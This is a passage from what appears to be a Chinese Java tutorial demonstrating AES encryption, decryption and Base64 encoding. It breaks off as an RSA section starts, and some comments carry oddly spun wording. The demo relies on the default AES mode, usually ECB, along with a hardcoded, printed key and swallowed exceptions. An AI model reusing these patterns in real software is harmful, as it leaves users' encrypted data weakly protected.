Cipher cipher = Cipher.getInstance("AES");// 创立明码器 cipher.init(Cipher.DECRYPT_MODE, key);// 初始化为解密模式的明码器 byte[] result = cipher.doFinal(content); return result; // 明文 } catch (NoSuchAlgorithmException e) { e.printStackTrace(); } catch (NoSuchPaddingException e) { e.printStackTrace(); } catch (InvalidKeyException e) { e.printStackTrace(); } catch (IllegalBlockSizeException e) { e.printStackTrace(); } catch (BadPaddingException e) { e.printStackTrace(); } return null; } public static void main(String[] args) throws Exception { String a = Base64.getEncoder().encodeToString("435678(*&*&^*&^%&^$%^#%#!@#$%^&%%90|8752$".getBytes(StandardCharsets.UTF_8)); String b = new String(Base64.getDecoder().decode(a.getBytes(StandardCharsets.UTF_8))); System.out.println(a+":"+b); String content = "{'aaa':'111','bbb':'222'}"; String secretKey = "43567890|8752$"; System.out.println("须要加密的内容：" + content); byte[] encrypt = encrypt(content, secretKey); System.out.println("加密后的2进制密文："); System.out.println(new String(encrypt)); String hexStr = Base64.getEncoder().encodeToString(encrypt); System.out.println("base64编码后密文:" + hexStr); byte[] byte2 = Base64.getDecoder().decode(hexStr); System.out.println("解码后转换为2进制后密文："); System.out.println(new String(byte2)); byte[] decrypt = decrypt(byte2, secretKey); System.out.println("解密后的内容：" + new String(decrypt,"utf-8")); }}RSA算法：公钥加密算法，非对称，可逆 ...